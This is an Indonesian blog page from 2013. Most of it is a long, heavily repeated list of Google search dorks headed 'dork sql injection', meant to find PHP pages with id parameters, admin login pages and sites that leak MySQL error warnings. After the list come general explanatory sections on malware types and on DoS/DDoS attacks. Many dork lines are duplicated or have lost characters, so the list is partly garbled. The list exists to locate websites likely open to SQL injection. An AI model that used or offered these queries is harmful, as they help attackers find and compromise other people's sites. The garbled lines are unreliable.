popcash

Selasa, 08 Oktober 2013

dork sql injection

inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurllay_old.php?id=
inurl:declaration_more.php?decl_id=
inurlageid=
inurl:games.php?id=
inurlage.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=d=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurltray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?av
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurlreview.php?id=
inurl:loadpsb.php?id=
inurlpinions.php?id=
inurl:spr.php?id=
inurlages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurlarticipant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurlrod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurlerson.php?id=
inurlroductinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurlrofile_view.php?id=
inurl:category.php?id=
inurlublications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurlrod_info.php?id=
inurl:shop.php?do=part&id=
inurlroductinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurlroduct.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurlroduit.php?id=
inurlop.php?id=
inurl:shopping.php?id=
inurlroductdetail.php?id=
inurlost.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurlage.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurlroduct_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:tran******.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurlpinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurlffer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
inur l: info.php?id=
inurl : pro.php?id=
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurllay_old.php?id=
inurl:declaration_more.php?decl_id=
inurlageid=
inurl:games.php?id=
inurlage.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurltray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurlreview.php?id=
inurl:loadpsb.php?id=
inurlpinions.php?id=
inurl:spr.php?id=
inurlages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurlarticipant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurlrod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurlerson.php?id=
inurlroductinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurlrofile_view.php?id=
inurl:category.php?id=
inurlublications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurlrod_info.php?id=
inurl:shop.php?do=part&id=
inurlroductinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurlroduct.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurlroduit.php?id=
inurlop.php?id=
inurl:shopping.php?id=
inurlroductdetail.php?id=
inurlost.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurlage.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurlroduct_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:tran******.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurlpinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurlffer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
inurl:shop+php?id+site:fr
"inurl:admin.asp"
"inurl:login/admin.asp"
"inurl:admin/login.asp"
"inurl:adminlogin.asp"
"inurl:adminhome.asp"
"inurl:admin_login.asp"
"inurl:administratorlogin.asp"
"inurl:login/administrator.asp"
"inurl:administrator_login.asp"
inurl:"id=" & intext:"Warning: mysql_fetch_assoc()
inurl:"id=" & intext:"Warning: mysql_fetch_array()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: session_start()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: is_writable()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: Unknown()
inurl:"id=" & intext:"Warning: session_start()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: pg_exec()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: mysql_query()
inurl:"id=" & intext:"Warning: array_merge()
inurl:"id=" & intext:"Warning: preg_match()
inurl:"id=" & intext:"Warning: ilesize()
inurl:"id=" & intext:"Warning: filesize()
inurl:"id=" & intext:"Warning: require()
inurl:index.php?id=
inurl:trainers.php?id=
inurl:login.asp
index of:/admin/login.asp
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:produit.php?id=+site:fr
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:pages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurllay_old.php?id=
inurl:declaration_more.php?decl_id=
inurlageid=
inurl:games.php?id=
inurlage.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurltray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurlreview.php?id=
inurl:loadpsb.php?id=
inurlpinions.php?id=
inurl:spr.php?id=
inurlages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurlarticipant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurlrod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurlerson.php?id=
inurlroductinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurlrofile_view.php?id=
inurl:category.php?id=
inurlublications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurlrod_info.php?id=
inurl:shop.php?do=part&id=
inurlroductinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurlroduct.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurlroduit.php?id=
inurlop.php?id=
inurl:shopping.php?id=
inurlroductdetail.php?id=
inurlost.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurlage.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurlroduct_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurlpinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurlffer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=

Malware ?

Mungkin sebagian anda sudah sering
mendengarnya, tetapi mungkin hanya sebagian orang yang tau tentang Malware.
berikut ini saya akan coba memberikan beberapa keterangan dan informasi tentang
apa itu dan apa saja yang termasuk ‘Malware’



‘Malware” adalah program komputer
yang di ciptakan dengan maksud dan tujuan tertentu dari penciptanya dan
merupakan program yang mencari kelemahan dari software.Umumnya Malware
diciptakan untuk membobol atau merusak suatu software atau operating sistem.

Berikut ini mungkin dapat membantu,
definisi menurut Wikipedia:



Malware (a portmanteau of “malicious
software”) is software designed to infiltrate or damage a computer system,
without the owner’s consent. The term describes the intent of the creator,
rather than any particular features. Malware is commonly taken to include
computer viruses, Trojan horses, and spyware. In law, malware is sometimes
known as a computer contaminant, for instance in the legal codes of California,
Virginia, and several other U.S. states. Malware is sometimes pejoratively
called scumware. Malware should not be confused with defective software, that
is, software which has a legitimate purpose but contains errors or bugs



.======================================================================



-=Virus=-

Inilah istilah yang sering dipakai
untuk seluruh jenis perangkat lunak yang mengganggu computer. Bias jadi karena
inilah tipe malware pertama yang muncul. Virus bisa bersarang di banyak tipe
file. Tapi boleh dibilang, target utama vireus adalah file yang bisa dijalankan
seperti EXE, COM dan VBS, yang menjadi bagian dari suatu perangkat lunak. Boot
sector juga sering dijadikan sasaran virus untuk bersarang. Beberapa file
dokumen juga bisa dijadikan sarang oleh virus. Penyebaran ke computer lain
dilakukan dengan bantuan pengguna computer. Saat file yang terinfeksi
dijalankan di computer lain, kemungkinan besar computer lain itu akan
terinfeksi pula. Virus mencari file lain yang bisa diserangnya dan kemudian
bersarang di sana.Bisa juga virus menyebar melalui jaringan peer-to-peer yang
sudah tak asing digunakan orang untuk berbagi file.



======================================================================



-=Worm=-

Worm alias cacing, begitu
sebutannya. Kalau virus bersarang pada suatu program atau dokumen,
cacing-cacing ini tidak demikan. Cacing adalah sebuah program yang berdiri
sendiri dan tidak membutuhkan sarang untuk menyebarkan diri. Hebatnya lagi,
cacing bisa saja tidak memerlukan bantuan orang untuk penyebarannya. Melalui
jaringan, cacing bisa “bertelur” di computer-komputer yang terhubung dalam
suatu kerapuhan (vulnerability) dari suatu system, biasanya system operasi.

Setelah masuk ke dalam suatu
computer, worm memodifikasi beberapa pengaturan di system operasi agar tetap
hidup. Minimal, ia memasukkan diri dalam proses boot suatu computer. Lainnya,
mungkin mematikan akses ke situs antivirus, menonaktifkan fitur keamanan di
system, dan tindakan lain.



======================================================================



-=Wabbit=-

Istilah ini mungkin asing, tapi
memang ada malware tipe ini. Seperti worm, wabbit tidak membutuhkan suatu
program dan dokumen untuk bersarang. Tetapi berbeda dengan worm, wabbit tidak
membutuhkan suatu program dan dokumen untuk bersarang. Tetapi berbeda dengan
worm yang menyebarkan diri ke computer lain menggunakan jaringan, wabbit
menggandakan diri secara terus-menerus didalam sebuah computer local dan hasil
penggandaan itu akan menggerogoti system.

Kinerja computer akan melambat
karena wabbit memakan sumber data yang lumayan banyak. Selain memperlambat
kinerja computer karena penggunaan sumber daya itu, wabbit bisa deprogram untuk
memiliki efek samping yang efeknya mirip dengan malware lain.
Kombinasi-kombinasi malware seperti inilah yang bisa sangat berbahaya.



======================================================================



-=Keylogger=-

Hati-hati kalau berinternet di
warnet. Bisa saja pada computer di warnet itu diinstall suatu perangkat lunak
yang dikenal dengan istilah keylogger yang mencatat semua tekanan tombol
keyboard.

Catatan yang disimpan dalam suatu
file yang bisa dilihat kemudian itu lengkap. Di dalamnya bisa terdapat
informasi seperti aplikasi tempat penekanan tombol dilakukan dan waktu
penekanan. Dengan cara ini, seseorang bisa mengetahui username, password dan
berbagai informasi lain yang dimasukkan dengan cara pengetikan.



Pada tingkat yang lebih canggih,
keylogger mengirimkan log yang biasanya berupa file teks itu ke seseorang.
Tentu saja itu dilakukan tanpa sepengetahuan si korban. Pada tingkat ini pula
keylogger bisa mengaktifkan diri ketika pengguna computer melakukan tindakan
tertentu.Misalnya begini. Ketika pengguna computer membuka situs e-banking,
keylogger aktif dan mencatat semua tekanan pada keylogger aktif dan mencatat
semua tekanan pada keyboard aktif dan mencatat semua tekanan pada keyboard di
situs itu dengan harapan nomor PIN dapat dicatat.



Keylogger ini cukup berbahaya karena
secanggih apa pun enkripsi yang diterapkan oleh suatu website, password tetap
dapat diambil. Pasalnya, password itu diambil sebelum sempat dienkripsi oleh
system. Jelas dong. Keylogger merekam sesaat setelah password diketikkan dan
belum diproses oleh system.



======================================================================



-=Browser Hijacker=-

Browser hijacker mengarahkan browser
yang seharusnya menampilkan situs yang sesuai dengan alamat yang dimasukkan ke
situs lain.Itu contoh paling parah dari gangguan yang disebabkan oleh browser
hijacker. Contoh lain yang bisa dilakukan oleh pembajak ini adalah menambahkan
bookmark, mengganti home page, serta mengubah pengaturan browser.



Bicara mengenai browser di sini
boelh yakin 100% browser yang dibicarakan adalah internet explorer. Selain
karena internet explorer adalah buatan Microsoft, raksasa penghasil perangkat
lunak yang produknya sering dijadikan sasaran serangan cracker, internet
explorer adalah browser yang paling banyak digunakan orang berinternet. Tak
heran, internet explorer telah menyatu dengan Windows, system operasi milik
Microsoft yang juga banyak diserbu oleh cracker.



======================================================================



-=Troya=-

Troya (Trojan) adalah malware yang
seolah-olah merupakan program yang berguna, yang menghibur, yang menyelamatkan,
padahal di balik itu, ia merusak. Kuda ini bisa ditunggangu oleh malware lain
seperti seperti virus, worm, spyware. Troya dapat digunakan untuk menyebarkan
atau mengaktifkan mereka.



======================================================================



-=Spyware=-

Spyware adalah perangkat lunak yang
mengumpulkan dan mengirim informasi tentang pengguna computer tanpa diketahui
oleh si pengguna itu.Informasinya bisa yang tidak terlampau berbahaya seperti
pola berkomputer, terutama berinternet, seseorang sampai yang berbahaya seperti
nomor kartu kredit, PIN untuk perbankan elektronik (e-banking) dan password
suatu akun.

Informasi tentang pola berinternet,
telah disebutkan, tidak terlampau berbahaya. Situs yang dikunjungi, informasi
yang kerap dicari, obrolan di ruang chat akan dimata-matai oleh si spyware.

Selanjutnya, informasi itu digunakan
untuk menampilkan iklan yang biasanya berupa jendela pop-up. Iklan itu
berhubungan dengan kebiasaan seseorang berinternet. Misalnya kerap kali
seseorang mencari informasi mengenai kamera digital. Jendela pop-up yang muncul
akan menampilkan, misalnya situs yang berdagang kamera digital. Adware adalah
istilah untuk spyware yang begini.

Penyebaran spyware mirip dengan
Trojan. Contohnya, flashget. Ketika flashget yang dipakai belum deregister,
flashget bertindak sebagai spyware. Coba saja hubungkan diri ke internet,
jalankan flashget yang belum deregister, cuekin computer beberapa saat, pasti
muncul jendela internet explorer yang menampilkan iklan suatu situs.



======================================================================



-=Backdoor=-

Ini namanya main belakang. Kepingin
cepat dapat Surat Izin mengemudi. Dari pada lewar prosedur standar yang
mengharuskan test ini dan test itu, mendingan siapkan duit buat nyogok aparat.
SIM cepat di dapat tanpa antre lama, tanpa test ini dan itu.

Tidak berbeda dengan dengan contoh
bikin SIM tadi, dengan melanggar prosedur, malware berusaha masuk ke dalam system
untuk mengakses sumber daya serta file. Berdasarkan cara bekerja dan perilaku
penyebarannya, backdoor dibagi menjadi 2 grup. Grup pertama mirip dengan Troya.
Mereka secara manual dimasukkan ke dalam suatu file program pada perangkat
lunak dan kemudian ketika perangkat lunak itu diinstall, mereka menyebar. Grup
yang kedua mirip dengan worm.

Backdoor dalam grup ini dijalankan
sebagai bagian dari proses boot.Ratware adalah sebutan untuk backdoor yang
mengubah computer menjadi zombie yang mengirim spam. Backdoor lain mampu
mengacaukan lalu lintas jaringan, melakukan brute force untuk meng-crack
password dan enkripsi., dan mendistribusikan serangan distributed denial of
service.



======================================================================

-=Dialer=-

Andaikat computer yang digunakan,
tidak ada hujan atau badai, berusaha menghubungkan diri ke internet padahal tak
ada satu pun perangkat lunak yang dijalankan membutuhkan koneksi, maka layaklah
bercuriga. Computer kemungkinan telah terjangkit oleh malware yang terkenal
dengan istilah dialer.



Dialer menghubungkan computer ke
internet guna mengirim kan informasi yang didapat oleh keylogger, spyware tau
malware lain ke si seseorang yang memang bertujuan demikian. Dia dan penyedia
jasa teleponlah yang paling diuntungkan dengan dialer ini



.======================================================================



-=Exploit dan rootkit=-

Kedua perangkat ini bisa dibilang
malware bisa pula tidak. Kenapa begitu? Penjelasanya kira-kira begini. Exploit
adalah perangkat lunak yang menyerang kerapuhan keamanan (security
vulnerability) yang spesifik namun tidak selalu bertujuan untuk melancarkan
aksi yang tidak diinginkan. Banyak peneliti keamanan computer menggunakan
exploit untuk mendemonstrasikan bahwa suatu system memiliki kerapuhan. Memang
ada badan peneliti yang bekerja sama dengan produsen perangkat lunak. Peneliti
itu bertugas mencari kerapuhan dari sebuah perangkat lunak dan kalau mereka
menemukannya, mereka melaporkan hasil temuan ke si produsen agar si produsen
dapat mengambil tindakan. Namun begitu exploit kadang menjadi bagian dari suatu
malware yang bertugas menyerang kerapuhan keamanan.



Berbeda dengan exploit yang secara
langsung menyerang system, rootkit tidak demikian. Rootkit dimasukkan ke dalam
computer oleh penyerang setelah computer berhasil diambil alih.

Rootkit berguna untuk menghapus
jejak penyerangan, seperti menghapus log dan menyembunyikan proses malware itu
sendiri. Rootkit juga bisa mengandung backdoor agar di hari depan nanti, si
penyerang bisa kembali mengambil alih system.Rootkit ini sulit di deteksi,
pasalnya rootkit ditanam pada system operasi di level kernel, level inti system
operasi.



Cara terbaik yang bisa diandalkan
untuk mendeteksi ada tidaknya rootkit di computer adalah dengan mematikan
computer dan boot ulang tidak dengan harddisk melainkan dengan media lain
seperti CD-ROM atau disket USB. Rootkit yang tidak berjalan tak dapat
bersembunyi dan kebanyakan antivirus dapat mengidentifikasikannya.



Produsen perangkat keamanan biasanya
telah mengintegrasikan pendeteksi rootkit di produknya. Meskipun rootkit di
menyembunyikan diri selama proses pemindaian berjalan, antivirus masih bisa
mengenalinya. Juga bila rootkit menarik diri dari system untuk sementara,
antivirus tetap dapat menemukannya dengan menggunakan deteksi “sidik jari”
alias byte unik dari rootkit.



Rootkit memang cerdik. Dia bisa
menganalisis proses-proses yang sedang berjalan. Andai ia mencurigai suatu
proses sebagai tindak tanduk antivirus, ia bisa menyembunyikan diri. Ketika
prose situ selesai, ia aktif kembali. Ada beberapa program yang bisa dipakai
untuk mendeteksi adanya rootkit pada system. Rootkit detector kit, chkrootkit
dan Rkhunter adalah contoh yang bisa digunakan.

Ddos ?

Serangan DoS (bahasa Inggris: denial-of-service attacks') adalah jenis serangan terhadap sebuah komputer atau server di dalam jaringan internet dengan cara menghabiskan sumber (resource) yang dimiliki oleh komputer tersebut sampai komputer tersebut tidak dapat menjalankan fungsinya dengan benar sehingga secara tidak langsung mencegah pengguna lain untuk memperoleh akses layanan dari komputer yang diserang Čšersebut.
Dalam sebuah serangan Denial of Service, si penyerang akan mencoba untuk mencegah akses seorang pengguna terhadap sistem atau jaringan dengan menggunakan beberapa cara, yakni sebagai berikut:
  • Membanjiri lalu lintas jaringan dengan banyak data sehingga lalu lintas jaringan yang datang dari pengguna yang terdaftar menjadi tidak dapat masuk ke dalam sistem jaringan. Teknik ini disebut sebagai traffic flooding.
  • Membanjiri jaringan dengan banyak request terhadap sebuah layanan jaringan yang disedakan oleh sebuah host sehingga request yang datang dari pengguna terdaftar tidak dapat dilayani oleh layanan tersebut. Teknik ini disebut sebagai request flooding.
  • Mengganggu komunikasi antara sebuah host dan kliennya yang terdaftar dengan menggunakan banyak cara, termasuk dengan mengubah informasi konfigurasi sistem atau bahkan perusakan fisik terhadap komponen dan server.
Bentuk serangan Denial of Service awal adalah serangan SYN Flooding Attack, yang pertama kali muncul pada tahun 1996 dan mengeksploitasi terhadap kelemahan yang terdapat di dalam protokol Transmission Control Protocol (TCP). Serangan-serangan lainnya akhirnya dikembangkan untuk mengeksploitasi kelemahan yang terdapat di dalam sistem operasi, layanan jaringan atau aplikasi untuk menjadikan sistem, layanan jaringan, atau aplikasi tersebut tidak dapat melayani pengguna, atau bahkan mengalami crash. Beberapa tool yang digunakan untuk melakukan serangan DoS pun banyak dikembangkan setelah itu (bahkan beberapa tool dapat diperoleh secara bebas), termasuk di antaranya Bonk, LAND, Smurf, Snork, WinNuke, dan Teardrop.
Meskipun demikian, serangan terhadap TCP merupakan serangan DoS yang sering dilakukan. Hal ini disebabkan karena jenis serangan lainnya (seperti halnya memenuhi ruangan hard disk dalam sistem, mengunci salah seorang akun pengguna yang valid, atau memodifikasi tabel routing dalam sebuah router) membutuhkan penetrasi jaringan terlebih dahulu, yang kemungkinan penetrasinya kecil, apalagi jika sistem jaringan tersebut telah diperkuat.
Percobaan serangan Denial of Service yang dilakukan terhadap sebuah host dengan sistem operasi Windows Server 2003 Service Pack 2 (Beta).

Penolakan Layanan secara Terdistribusi (DDos)

Cara kerja serangan Distributed Denial of Service sederhana
Penolakan Layanan secara Terdistribusi (bahasa Inggris: Distributed Denial of Service (DDos)) adalah salah satu jenis serangan Denial of Service yang menggunakan banyak host penyerang (baik itu menggunakan komputer yang didedikasikan untuk melakukan penyerangan atau komputer yang "dipaksa" menjadi zombie) untuk menyerang satu buah host target dalam sebuah jaringan.
